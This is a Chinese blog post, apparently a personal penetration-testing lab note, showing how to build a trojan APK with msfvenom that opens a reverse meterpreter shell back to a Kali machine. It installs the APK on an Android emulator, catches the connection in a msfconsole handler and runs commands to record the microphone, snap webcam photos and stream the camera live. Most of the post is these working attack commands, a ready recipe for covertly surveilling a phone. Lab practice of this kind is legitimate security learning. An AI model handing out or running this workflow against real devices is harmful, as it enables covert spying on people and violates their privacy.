渗透测试基础之永恒之蓝漏洞复现http://t.csdn.cn/EsMu2
本文章主要是进行一次测试吧,自己之前也没有进行过测试关于apk木马远控,最近事情也比较多,自己也就做一个简单的测试吧,后期会尝试使用自己的手机做一个真机测试.
- Kali平台(Hack):192.168.10.xxx
- Android模拟器(靶机1)
- kali需要使用桥接模式,不然无法使用
如果出现桥接无法使用可以看这位大佬的配置教程
打开官网进行下载
雷电安卓模拟器-手游模拟器安卓版_android手机模拟器电脑版_雷电模拟器官网 (ldmnq.com)https://www.ldmnq.com/
下载完后。点击.exe文件直接运行安装,运行,下一步,直接完成安装。
安装后我们会在桌面看到这两个图标,然后我们点击雷神多开器
安照我自己的理解就是,我们是在模拟器中模拟手机,所以就类似于我们使用虚拟机一样,所以我们需要将其与主机在同一网段下,这样我们才能对其进行攻击与控制.
对模拟器网络进行配置在右边的设置里面选择设置>网络设置>网络桥接模式开启,ip设置dhcp,最下面点击安装:
打开虚拟机,启动kali,打开终端,生成apk后门。lhost为kali的ip(可以根据自己的IP设定),lport指定一个端口5001(这里生成时指定的端口要与后续使用攻击端口一致,当然也不能使用特殊端口)。打开终端输入命令:
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.223.138 lport=5001 >内心如初.apk
生成文件后,因为我是在桌面打开的终端文件会自动生成到桌面,然后将apk文件粘贴到我们的windows平台下,然后启动我们的雷电模拟器,点击启动:
这里我们可以将文件拖入或是选择文件放入也行
在右下角有个apk,点击选择文件安装。
出现下面的图标代表安装木马文件成功
这里关于前面的内容我就快速过来了,如果感兴趣的可以去看系列文章,有前面操作的详细介绍
msfconsole
use exploit/multi/handler
攻击载荷也就是攻击的脚本
set payload android/meterpreter/reverse_tcp
这里设置的ip地址是kali的,设置的端口要与制作木马时设置的一致
set lhost 192.168.xxx.xxx
set lport 5001
run
只要双击一次即可,这里是我多点了
这里在进行其他操作前需要先加载stdapi扩展
load stdapi
sysinfo
ifconfig
check_root
手机无root权限
webcam_chat
webcam_list
显示有两个摄像头
record_mic
进行调用摄像头偷拍,默认为前置摄像头
webcam_snap
网页摄像机视屏流,显示实时画面能够调用摄像头,实时观看被攻击者的像机对着的物体,以下为通过此办法可以获取到一段图片资料
webcam_stream
获得shell后有很多的攻击方法,将其汇总如下:
本章是对使用木马对手机渗透远控的一次测试,在测试过程中我遇到了,在连接时IP无法使用,在我的思考下,我发现可能是主机的链接方式需要以桥接模式,这样才能保证,主机与和攻击目在同一网段下,但我链接后,发现无论如何也没发连上桥接网络的网络,并且是用ifconfig,并没有显示kali的主机ipv4地址,在我的不断搜索和尝试下,最终连上了网路获取到了新的IP地址,然后重新制作木马apk文件,再进行一次刚刚的流程,虽然解决问题的过程很累,但解决的那一刻,我是很欣喜的,快乐也就如此了吧,再学习自己喜欢的事情上,总是很有动力.
每日一言
如果可以的话,我也想成为这个世界中特殊的存在。
如果我的学习笔记对你有用,不妨点赞收藏一下,感谢你的支持,当然也欢迎大佬给我一下建议或是对笔记中的不足进行补充,对我学习大有帮助,谢谢。